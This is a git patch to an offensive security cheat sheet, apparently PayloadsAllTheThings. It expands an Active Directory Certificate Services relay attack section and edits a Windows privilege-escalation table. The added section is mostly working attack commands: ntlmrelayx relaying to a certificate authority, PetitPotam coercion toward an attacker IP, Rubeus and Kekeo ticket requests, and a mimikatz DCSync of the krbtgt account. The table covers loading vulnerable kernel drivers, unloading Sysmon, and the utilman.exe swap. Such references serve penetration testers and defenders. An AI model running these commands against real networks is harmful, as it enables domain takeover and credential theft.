From 3a4bd977625632fbf8ae10ba28755a74423a9235 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 25 Jul 2021 11:40:19 +0200 Subject: [PATCH] AD CS - Mimikatz / Rubeus --- .../Active Directory Attack.md | 45 +++++++++++++------ .../Windows - Privilege Escalation.md | 3 +- 2 files changed, 34 insertions(+), 14 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 10b7cf4..b4c8b11 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1737,27 +1737,46 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ``` - #### AD CS Relay Attack -https://github.com/SecureAuthCorp/impacket/pull/1101 +Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) -1. Run the ntlmrelayx.py and set your Certificate Authority (CA) as a target - ```powershell - python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - python3 ntlmrelayx.py -t http://cs1.lab.local/certsrv/certfnsh.asp -smb2support --adcs - ``` -2. Exploit the print spooler bug +* Version 1: NTLM Relay + Rubeus + PetitPotam ```powershell + impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation + # template workstation, DomainController, Machine + + # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam + # You can also use any other way to coerce the authentication like printspooler + git clone https://github.com/topotam/PetitPotam + python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP + python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP python3 dementor.py -u -p -d python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local - ``` -3. Request the TGT using the certificate - ```powershell + + # Use the certificate with rubeus to request a TGT Rubeus.exe asktgt /user: /certificate: /ptt - Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzCC......NfrHtUUXS /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt + + # Now you can use the TGT to perform a DCSync + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* Version 2: NTLM Relay + Mimikatz + Kekeo + ```powershell + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController + + # Mimikatz + mimikatz> misc::efs /server:dc.lab.local /connect: /noauth + + # Kekeo + kekeo> base64 /input:on + kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt + + # Mimikatz + mimikatz> lsadump::dcsync /user:krbtgt ``` -4. Now you can DCSync with the DC machine account ### Dangerous Built-in Groups Usage diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bde930e..d8cb00a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -976,7 +976,7 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP

- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.

- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | |`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || |`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | -|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | +|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | |`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || @@ -1314,3 +1314,4 @@ Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\sys * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) +* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)